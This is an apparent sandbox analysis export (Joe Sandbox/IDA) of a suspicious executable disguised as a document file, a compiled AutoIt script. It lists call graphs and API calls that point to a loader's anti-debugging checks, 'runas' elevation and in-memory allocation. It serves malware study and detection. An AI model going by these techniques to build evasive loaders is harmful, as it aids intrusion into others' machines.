API calls 3 library calls 104160->104266 104163->104145 104164->104141 104165->104141 104167 7335e2 104166->104167 104168 7335cd 104166->104168 104167->104160 104169 73889e __wmakepath_s 47 API calls 104168->104169 104170 7335d2 104169->104170 104171 737aa0 __wmakepath_s 8 API calls 104170->104171 104172 7335dd 104171->104172 104172->104160 104174 73fbe0 104173->104174 104175 73fbf7 104173->104175 104177 73886a __lseeki64 47 API calls 104174->104177 104176 74032f 104175->104176 104180 73fc31 104175->104180 104178 73886a __lseeki64 47 API calls 104176->104178 104179 73fbe5 104177->104179 104181 740334 104178->104181 104182 73889e __wmakepath_s 47 API calls 104179->104182 104183 73fc39 104180->104183 104191 73fc50 104180->104191 104184 73889e 
__wmakepath_s 47 API calls 104181->104184 104187 73fbec 104182->104187 104185 73886a __lseeki64 47 API calls 104183->104185 104186 73fc45 104184->104186 104188 73fc3e 104185->104188 104189 737aa0 __wmakepath_s 8 API calls 104186->104189 104187->104160 104193 73889e __wmakepath_s 47 API calls 104188->104193 104189->104187 104190 73fc65 104194 73886a __lseeki64 47 API calls 104190->104194 104191->104187 104191->104190 104192 73fc7f 104191->104192 104196 73fc9d 104191->104196 104192->104190 104195 73fc8a 104192->104195 104193->104186 104194->104188 104200 7449a2 __stbuf 47 API calls 104195->104200 104198 737660 __malloc_crt 47 API calls 104196->104198 104199 73fcad 104198->104199 104201 73fcd0 104199->104201 104202 73fcb5 104199->104202 104203 73fd9e 104200->104203 104205 7405df __lseeki64_nolock 49 API calls 104201->104205 104206 73889e __wmakepath_s 47 API calls 104202->104206 104204 73fe17 ReadFile 104203->104204 104207 73fdb4 GetConsoleMode 104203->104207 104209 7402f7 GetLastError 104204->104209 104210 73fe39 104204->104210 104208 73fcde 104205->104208 104211 73fcba 104206->104211 104212 73fe14 104207->104212 104213 73fdc8 104207->104213 104208->104195 104214 740304 104209->104214 104215 73fdf7 104209->104215 104210->104209 104219 73fe09 104210->104219 104216 73886a __lseeki64 47 API calls 104211->104216 104212->104204 104213->104212 104217 73fdce ReadConsoleW 104213->104217 104218 73889e __wmakepath_s 47 API calls 104214->104218 104223 73887d __dosmaperr 47 API calls 104215->104223 104226 73fdfd 104215->104226 104220 73fcc5 104216->104220 104217->104219 104222 73fdf1 GetLastError 104217->104222 104221 740309 104218->104221 104219->104226 104227 73fe6e 104219->104227 104235 7400db 104219->104235 104220->104187 104224 73886a __lseeki64 47 API calls 104221->104224 104222->104215 104223->104226 104224->104226 104225 7328ca _free 47 API calls 104225->104187 104226->104187 104226->104225 104229 73feda ReadFile 104227->104229 104237 73ff5b 104227->104237 104231 73fefb 
GetLastError 104229->104231 104242 73ff05 104229->104242 104230 7401e1 ReadFile 104236 740204 GetLastError 104230->104236 104243 740212 104230->104243 104231->104242 104232 740018 104238 73ffc8 MultiByteToWideChar 104232->104238 104239 7405df __lseeki64_nolock 49 API calls 104232->104239 104233 740008 104234 73889e __wmakepath_s 47 API calls 104233->104234 104234->104226 104235->104226 104235->104230 104236->104243 104237->104226 104237->104232 104237->104233 104237->104238 104238->104222 104238->104226 104239->104238 104240 7405df __lseeki64_nolock 49 API calls 104240->104242 104241 7405df __lseeki64_nolock 49 API calls 104241->104243 104242->104227 104242->104240 104243->104235 104243->104241 104245 73f921 104244->104245 104249 73f936 104244->104249 104246 73889e __wmakepath_s 47 API calls 104245->104246 104247 73f926 104246->104247 104248 737aa0 __wmakepath_s 8 API calls 104247->104248 104258 73f931 104248->104258 104250 73f96b 104249->104250 104251 744bd4 __getbuf 47 API calls 104249->104251 104249->104258 104252 7335c3 __stbuf 47 API calls 104250->104252 104251->104250 104253 73f97f 104252->104253 104254 73fab6 __filbuf 62 API calls 104253->104254 104255 73f986 104254->104255 104256 7335c3 __stbuf 47 API calls 104255->104256 104255->104258 104257 73f9a9 104256->104257 104257->104258 104259 7335c3 __stbuf 47 API calls 104257->104259 104258->104160 104260 73f9b5 104259->104260 104260->104258 104261 7335c3 __stbuf 47 API calls 104260->104261 104262 73f9c2 104261->104262 104263 7335c3 __stbuf 47 API calls 104262->104263 104263->104258 104264->104153 104265->104155 104266->104160 104267->104153 104269 734b01 __freefls@4 104268->104269 104270 734b24 104269->104270 104271 734b0f 104269->104271 104273 735a9f __lock_file 48 API calls 104270->104273 104282 73889e 47 API calls __getptd_noexit 104271->104282 104275 734b2a 104273->104275 104274 734b14 104283 737aa0 8 API calls __wmakepath_s 104274->104283 104284 73479c 55 API calls 6 library calls 104275->104284 104278 
734b35 104285 734b55 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 104278->104285 104280 734b47 104281 734b1f __freefls@4 104280->104281 104281->103999 104282->104274 104283->104281 104284->104278 104285->104280 104286->103916 104287->103934 104289 75c25c 104288->104289 104290 75c26a 104288->104290 104291 734129 117 API calls 104289->104291 104292 75c2af 104290->104292 104293 734129 117 API calls 104290->104293 104312 75c273 104290->104312 104291->104290 104319 75c4d4 104292->104319 104294 75c294 104293->104294 104294->104292 104296 75c29d 104294->104296 104300 734274 __fcloseall 83 API calls 104296->104300 104296->104312 104297 75c2f3 104298 75c2f7 104297->104298 104299 75c318 104297->104299 104302 75c304 104298->104302 104304 734274 __fcloseall 83 API calls 104298->104304 104323 75c0d1 104299->104323 104300->104312 104305 734274 __fcloseall 83 API calls 104302->104305 104302->104312 104304->104302 104305->104312 104306 75c346 104332 75c376 104306->104332 104307 75c326 104309 75c333 104307->104309 104311 734274 __fcloseall 83 API calls 104307->104311 104309->104312 104314 734274 __fcloseall 83 API calls 104309->104314 104311->104309 104312->103946 104314->104312 104317 75c361 104317->104312 104318 734274 __fcloseall 83 API calls 104317->104318 104318->104312 104320 75c4e2 _memmove _W_expandtime 104319->104320 104321 75c4f9 104319->104321 104320->104297 104322 7344ae __fread_nolock 64 API calls 104321->104322 104322->104320 104324 7345ec _W_store_winword 47 API calls 104323->104324 104325 75c0e0 104324->104325 104326 7345ec _W_store_winword 47 API calls 104325->104326 104327 75c0f4 104326->104327 104328 7345ec _W_store_winword 47 API calls 104327->104328 104329 75c108 104328->104329 104330 75c450 47 API calls 104329->104330 104331 75c11b 104329->104331 104330->104331 104331->104306 104331->104307 104338 75c38c 104332->104338 104333 75c43d 104361 75c676 104333->104361 104335 75c34d 104340 75c450 104335->104340 104337 75c12d 64 API calls 104337->104338 
104338->104333 104338->104335 104338->104337 104365 75c22e 64 API calls 104338->104365 104366 75c553 80 API calls 104338->104366 104341 75c45d 104340->104341 104345 75c463 104340->104345 104342 7328ca _free 47 API calls 104341->104342 104342->104345 104343 75c354 104343->104317 104348 734274 104343->104348 104344 75c474 104344->104343 104347 7328ca _free 47 API calls 104344->104347 104345->104344 104346 7328ca _free 47 API calls 104345->104346 104346->104344 104347->104343 104349 734280 __freefls@4 104348->104349 104350 734294 104349->104350 104351 7342ac 104349->104351 104411 73889e 47 API calls __getptd_noexit 104350->104411 104353 735a9f __lock_file 48 API calls 104351->104353 104358 7342a4 __freefls@4 104351->104358 104355 7342be 104353->104355 104354 734299 104412 737aa0 8 API calls __wmakepath_s 104354->104412 104395 734208 104355->104395 104358->104317 104362 75c683 104361->104362 104363 75c694 104361->104363 104367 73373e 104362->104367 104363->104335 104365->104338 104366->104338 104369 73374a __freefls@4 104367->104369 104368 733774 __freefls@4 104368->104363 104369->104368 104370 733764 104369->104370 104371 73377c 104369->104371 104392 73889e 47 API calls __getptd_noexit 104370->104392 104373 735a9f __lock_file 48 API calls 104371->104373 104375 733782 104373->104375 104374 733769 104393 737aa0 8 API calls __wmakepath_s 104374->104393 104380 7335e7 104375->104380 104383 7335f6 104380->104383 104386 733614 104380->104386 104381 733604 104382 73889e __wmakepath_s 47 API calls 104381->104382 104384 733609 104382->104384 104383->104381 104383->104386 104390 73362c _memmove 104383->104390 104385 737aa0 __wmakepath_s 8 API calls 104384->104385 104385->104386 104394 7337b4 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 104386->104394 104387 739af3 __swprintf 78 API calls 104387->104390 104388 733914 __flush 78 API calls 104388->104390 104389 7335c3 __stbuf 47 API calls 104389->104390 104390->104386 104390->104387 104390->104388 104390->104389 104391 
73bd14 __flswbuf 78 API calls 104390->104391 104391->104390 104392->104374 104393->104368 104394->104368 104396 734217 104395->104396 104397 73422b 104395->104397 104447 73889e 47 API calls __getptd_noexit 104396->104447 104409 734227 104397->104409 104414 733914 104397->104414 104400 73421c 104448 737aa0 8 API calls __wmakepath_s 104400->104448 104405 7335c3 __stbuf 47 API calls 104406 734245 104405->104406 104424 73f782 104406->104424 104408 73424b 104408->104409 104410 7328ca _free 47 API calls 104408->104410 104413 7342e3 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 104409->104413 104410->104409 104411->104354 104412->104358 104413->104358 104415 733927 104414->104415 104419 73394b 104414->104419 104416 7335c3 __stbuf 47 API calls 104415->104416 104415->104419 104417 733944 104416->104417 104449 73bd14 104417->104449 104420 73f8e6 104419->104420 104421 73423f 104420->104421 104422 73f8f3 104420->104422 104421->104405 104422->104421 104423 7328ca _free 47 API calls 104422->104423 104423->104421 104425 73f78e __freefls@4 104424->104425 104426 73f796 104425->104426 104427 73f7ae 104425->104427 104498 73886a 47 API calls __getptd_noexit 104426->104498 104429 73f82b 104427->104429 104434 73f7d8 104427->104434 104502 73886a 47 API calls __getptd_noexit 104429->104502 104430 73f79b 104499 73889e 47 API calls __getptd_noexit 104430->104499 104433 73f830 104503 73889e 47 API calls __getptd_noexit 104433->104503 104474 73b6a0 104434->104474 104437 73f7de 104440 73f7f1 104437->104440 104441 73f7fc 104437->104441 104438 73f838 104504 737aa0 8 API calls __wmakepath_s 104438->104504 104483 73f84c 104440->104483 104500 73889e 47 API calls __getptd_noexit 104441->104500 104444 73f7f7 104501 73f823 RtlLeaveCriticalSection __unlock_fhandle 104444->104501 104445 73f7a3 __freefls@4 104445->104408 104447->104400 104448->104409 104450 73bd20 __freefls@4 104449->104450 104451 73bd40 104450->104451 104452 73bd28 104450->104452 104454 73bdd5 104451->104454 104459 73bd72 
104451->104459 104453 73886a __lseeki64 47 API calls 104452->104453 104455 73bd2d 104453->104455 104456 73886a __lseeki64 47 API calls 104454->104456 104457 73889e __wmakepath_s 47 API calls 104455->104457 104458 73bdda 104456->104458 104467 73bd35 __freefls@4 104457->104467 104460 73889e __wmakepath_s 47 API calls 104458->104460 104461 73b6a0 ___lock_fhandle 49 API calls 104459->104461 104462 73bde2 104460->104462 104463 73bd78 104461->104463 104464 737aa0 __wmakepath_s 8 API calls 104462->104464 104465 73bd8b 104463->104465 104466 73bd9e 104463->104466 104464->104467 104469 73bdf6 __chsize_nolock 75 API calls 104465->104469 104468 73889e __wmakepath_s 47 API calls 104466->104468 104467->104419 104471 73bda3 104468->104471 104470 73bd97 104469->104470 104473 73bdcd __flswbuf RtlLeaveCriticalSection 104470->104473 104472 73886a __lseeki64 47 API calls 104471->104472 104472->104470 104473->104467 104476 73b6ac __freefls@4 104474->104476 104475 73b6f9 RtlEnterCriticalSection 104478 73b71f __freefls@4 104475->104478 104476->104475 104477 738984 __lock 47 API calls 104476->104477 104479 73b6d0 104477->104479 104478->104437 104480 73b6db InitializeCriticalSectionAndSpinCount 104479->104480 104481 73b6ed 104479->104481 104480->104481 104482 73b723 ___lock_fhandle RtlLeaveCriticalSection 104481->104482 104482->104475 104484 73b957 __close_nolock 47 API calls 104483->104484 104487 73f85a 104484->104487 104485 73f8b0 104486 73b8d1 __free_osfhnd 48 API calls 104485->104486 104489 73f8b8 104486->104489 104487->104485 104488 73f88e 104487->104488 104490 73b957 __close_nolock 47 API calls 104487->104490 104488->104485 104491 73b957 __close_nolock 47 API calls 104488->104491 104493 73f8da 104489->104493 104496 73887d __dosmaperr 47 API calls 104489->104496 104494 73f885 104490->104494 104492 73f89a CloseHandle 104491->104492 104492->104485 104495 73f8a6 GetLastError 104492->104495 104493->104444 104497 73b957 __close_nolock 47 API calls 104494->104497 104495->104485 
104496->104493 104497->104488 104498->104430 104499->104445 104500->104444 104501->104445 104502->104433 104503->104438 104504->104445 104505->103830 104506->103833 104507->103837 104508->103843 104509->103850 104510->103852 104511->103849 104512->103857 104513->103860 104514->103877 104515->103872 104517 7131c7 104516->104517 104518 784aa5 GetFullPathNameW 104516->104518 104573 713bcf 104517->104573 104520 784abd 104518->104520 104521 7131cd GetFullPathNameW 104522 7131e7 104521->104522 104522->103684 104524 713a8b SHGetDesktopFolder 104523->104524 104526 713ade 104523->104526 104525 713a99 104524->104525 104524->104526 104525->104526 104527 713ac8 SHGetPathFromIDListW 104525->104527 104526->103686 104527->104526 104531 713ba9 104528->104531 104535 713b72 104528->104535 104529 731bc7 _W_store_winword 59 API calls 104529->104531 104530 713bcf 48 API calls 104532 713b7d 104530->104532 104531->104529 104533 7833e5 104531->104533 104531->104535 104577 71197e 104532->104577 104535->104530 104537 71197e 48 API calls 104538 713b9f 104537->104538 104539 713dcb 104538->104539 104540 713f9b 136 API calls 104539->104540 104541 713def 104540->104541 104542 7839f9 104541->104542 104543 713f9b 136 API calls 104541->104543 104544 75cc82 122 API calls 104542->104544 104545 713e02 104543->104545 104546 783a0e 104544->104546 104545->104542 104547 713e0a 104545->104547 104548 783a2f 104546->104548 104549 783a12 104546->104549 104551 783a1a 104547->104551 104552 713e16 104547->104552 104550 73010a 48 API calls 104548->104550 104553 713e39 84 API calls 104549->104553 104572 783a74 Mailbox 104550->104572 104608 75757b 87 API calls _wprintf 104551->104608 104607 71bdf0 163 API calls 8 library calls 104552->104607 104553->104551 104556 713e2e 104556->103688 104557 783a28 104557->104548 104558 783c24 104559 7328ca _free 47 API calls 104558->104559 104560 783c2c 104559->104560 104561 713e39 84 API calls 104560->104561 104566 783c35 104561->104566 104565 7328ca _free 47 API calls 
104565->104566 104566->104565 104567 713e39 84 API calls 104566->104567 104610 7532b0 86 API calls 4 library calls 104566->104610 104567->104566 104569 71caee 48 API calls 104569->104572 104572->104558 104572->104566 104572->104569 104583 7530ac 104572->104583 104586 75a525 104572->104586 104592 71b6d0 104572->104592 104601 71a870 104572->104601 104609 752fcd 60 API calls 2 library calls 104572->104609 104574 713bd9 __NMSG_WRITE 104573->104574 104575 73010a 48 API calls 104574->104575 104576 713bee _wcscpy 104575->104576 104576->104521 104578 711990 104577->104578 104582 7119af _memmove 104577->104582 104580 73010a 48 API calls 104578->104580 104579 73010a 48 API calls 104581 7119c6 104579->104581 104580->104582 104581->104537 104582->104579 104584 73010a 48 API calls 104583->104584 104585 7530dc _memmove 104584->104585 104585->104572 104588 75a530 104586->104588 104587 73010a 48 API calls 104589 75a547 104587->104589 104588->104587 104590 75a556 104589->104590 104591 71caee 48 API calls 104589->104591 104590->104572 104591->104590 104593 71b789 104592->104593 104596 71b6e3 _memmove 104592->104596 104595 73010a 48 API calls 104593->104595 104594 73010a 48 API calls 104597 71b6ea 104594->104597 104595->104596 104596->104594 104598 71b71b 104597->104598 104599 73010a 48 API calls 104597->104599 104598->104572 104600 71b74d 104599->104600 104600->104572 104602 71a883 104601->104602 104605 71a93d 104601->104605 104604 73010a 48 API calls 104602->104604 104602->104605 104606 71a8c1 104602->104606 104603 73010a 48 API calls 104603->104606 104604->104606 104605->104572 104606->104603 104606->104605 104607->104556 104608->104557 104609->104572 104610->104566 104612 71a72c 104611->104612 104617 71a848 104611->104617 104613 73010a 48 API calls 104612->104613 104612->104617 104614 71a753 104613->104614 104615 73010a 48 API calls 104614->104615 104616 71a7c5 104615->104616 104616->104617 104620 71a870 48 API calls 104616->104620 104621 71b6d0 48 API calls 104616->104621 104624 
[Control-flow graph rendering not reproduced: the page carried only the raw node/edge listing of the figure. Recoverable from the node labels: the graph covers the compiled AutoIt stub in the image based at 0x710000 (window class registration via RegisterClassExW, the tray icon via Shell_NotifyIconW, registry reads via RegOpenKeyExW/RegQueryValueExW, COM activation via CLSIDFromProgID/CoCreateInstance, temp-file handling via GetTempPathW/GetTempFileNameW/CopyFileW/DeleteFileW, OS fingerprinting via GetVersionExW/GetNativeSystemInfo/GetSystemInfo, and an exit path through GetCurrentProcess/TerminateProcess); a separate routine at 0x84b090 that resolves imports with LoadLibraryA/GetProcAddress, calls VirtualProtect twice and then ExitProcess; and a routine at 0x4d723b0 that reads the PEB (node 4d734b0 GetPEB), then calls Sleep, CreateFileW, VirtualAlloc, ReadFile and ExitProcess.]

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0071376D
  • Part of subcall function 00714257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DOC092024-0431202229487.exe,00000104,?,00000000,00000001,00000000), ref: 0071428C
• IsDebuggerPresent.KERNEL32(?,?), ref: 0071377F
• GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\DOC092024-0431202229487.exe,00000104,?,007D1120,C:\Users\user\Desktop\DOC092024-0431202229487.exe,007D1124,?,?), ref: 007137EE
  • Part of subcall function 007134F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0071352A
• SetCurrentDirectoryW.KERNEL32(?), ref: 00713860
• MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,007C2934,00000010), ref: 007821C5
• SetCurrentDirectoryW.KERNEL32(?,?), ref: 007821FD
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00782232
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,007ADAA4), ref: 00782290
• ShellExecuteW.SHELL32(00000000), ref: 00782297
  • Part of subcall function 007130A5: GetSysColorBrush.USER32(0000000F), ref: 007130B0
  • Part of subcall function 007130A5: LoadCursorW.USER32(00000000,00007F00), ref: 007130BF
  • Part of subcall function 007130A5: LoadIconW.USER32(00000063), ref: 007130D5
  • Part of subcall function 007130A5: LoadIconW.USER32(000000A4), ref: 007130E7
  • Part of subcall function 007130A5: LoadIconW.USER32(000000A2), ref: 007130F9
  • Part of subcall function 007130A5: RegisterClassExW.USER32(?), ref: 00713167
  • Part of subcall function 00712E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00712ECB
  • Part of subcall function 00712E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00712EEC
  • Part of subcall function 00712E9D: ShowWindow.USER32(00000000), ref: 00712F00
  • Part of subcall function 00712E9D: ShowWindow.USER32(00000000), ref: 00712F09
  • Part of subcall function 00713598: _memset.LIBCMT ref: 007135BE
  • Part of subcall function 00713598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00713667
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                        • String ID: C:\Users\user\Desktop\DOC092024-0431202229487.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$"}
                                                        • API String ID: 4253510256-2293759984
                                                        • Opcode ID: 2d46e8860e69e6ac36ff18df8a8a3087b92a57e74384365f257cb6ab2f5253b1
                                                        • Instruction ID: a2f5518a1e3b0d5bfb903a5abef1ae5734da34d1693a103b44446658560ac980
                                                        • Opcode Fuzzy Hash: 2d46e8860e69e6ac36ff18df8a8a3087b92a57e74384365f257cb6ab2f5253b1
                                                        • Instruction Fuzzy Hash: CE5127B0644248FBCB10FBA8AC4AFED3B78AB15710F40406BF641A21D2C67D5AC6CB75

                                                        Control-flow Graph
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c1ad3d77d7dffca7a1ad5b781f23799e7376c08607e0b526a7853e9854748a5e
                                                        • Instruction ID: 6189f35c67ea7ab4e342c9281b9144dd8f6271b6a3bb9836bf48d42396eedad6
                                                        • Opcode Fuzzy Hash: c1ad3d77d7dffca7a1ad5b781f23799e7376c08607e0b526a7853e9854748a5e
                                                        • Instruction Fuzzy Hash: 0A324E75B02228CFEB258F58DD456E9B7B5FB46310F1841D9E40AE7A42D738AE80CF52

                                                        Control-flow Graph
                                                        APIs
                                                        • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00712A33
                                                        • KillTimer.USER32(?,00000001), ref: 00712A5D
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00712A80
                                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00712A8B
                                                        • CreatePopupMenu.USER32 ref: 00712A9F
                                                        • PostQuitMessage.USER32(00000000), ref: 00712AAE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                        • String ID: TaskbarCreated
                                                        • API String ID: 157504867-2362178303
                                                        • Opcode ID: 2a388a54729f0bbfa653f4a66bb7cad882d7499e5bda543ef7da8b0ef4f5537f
                                                        • Instruction ID: 365c9a774515ff26d1f9dd47dfd7220f327983979dee02316c99082679e8100f
                                                        • Opcode Fuzzy Hash: 2a388a54729f0bbfa653f4a66bb7cad882d7499e5bda543ef7da8b0ef4f5537f
                                                        • Instruction Fuzzy Hash: 5D41F531214245ABDB34BF6C9C09BF93766EF14341F44C126F902921E3EA6D9CE39769

                                                        Control-flow Graph
                                                        APIs
                                                        • GetVersionExW.KERNEL32(?), ref: 0072E4A7
                                                          • Part of subcall function 00717E53: _memmove.LIBCMT ref: 00717EB9
                                                        • GetCurrentProcess.KERNEL32(00000000,007ADC28,?,?), ref: 0072E567
                                                        • GetNativeSystemInfo.KERNEL32(?,007ADC28,?,?), ref: 0072E5BC
                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0072E5C7
                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0072E5DA
                                                        • GetSystemInfo.KERNEL32(?,007ADC28,?,?), ref: 0072E5E4
                                                        • GetSystemInfo.KERNEL32(?,007ADC28,?,?), ref: 0072E5F0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                        • String ID:
                                                        • API String ID: 2717633055-0
                                                        • Opcode ID: 759e6d198a13a2858eabf986eca2e6668349ee4c19b53682a84971e3ac40e6bc
                                                        • Instruction ID: a09fae73abcd8a27b0dd6c33dfbc7cd488ae314bc197dedc103522d7f045b654
                                                        • Opcode Fuzzy Hash: 759e6d198a13a2858eabf986eca2e6668349ee4c19b53682a84971e3ac40e6bc
                                                        • Instruction Fuzzy Hash: 8361E2B18193D4CFCF15DF68A8C01E97FB46F2A304F2985D9D8449B24BD638C949CB66

                                                        Control-flow Graph
                                                        APIs
                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00713202
                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00713219
                                                        • LoadResource.KERNEL32(?,00000000), ref: 007857D7
                                                        • SizeofResource.KERNEL32(?,00000000), ref: 007857EC
                                                        • LockResource.KERNEL32(?), ref: 007857FF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                        • String ID: SCRIPT
                                                        • API String ID: 3051347437-3967369404
                                                        • Opcode ID: 7c097e17aba5e4f8a7dcb80522aad390eefd05af6755c2d875ca7f6d3bb6676c
                                                        • Instruction ID: 77d17601519b174f14e375f8ebc460b5b2d8ecf3de40c9263fb48fde8da34232
                                                        • Opcode Fuzzy Hash: 7c097e17aba5e4f8a7dcb80522aad390eefd05af6755c2d875ca7f6d3bb6676c
                                                        • Instruction Fuzzy Hash: 1A117970200701BFE721AB69EC48FA77BB9FBC9B51F208029B50287290DB75DD418A60
                                                        APIs
                                                        • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 007510B8
                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007510EE
                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007510FF
                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00751181
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
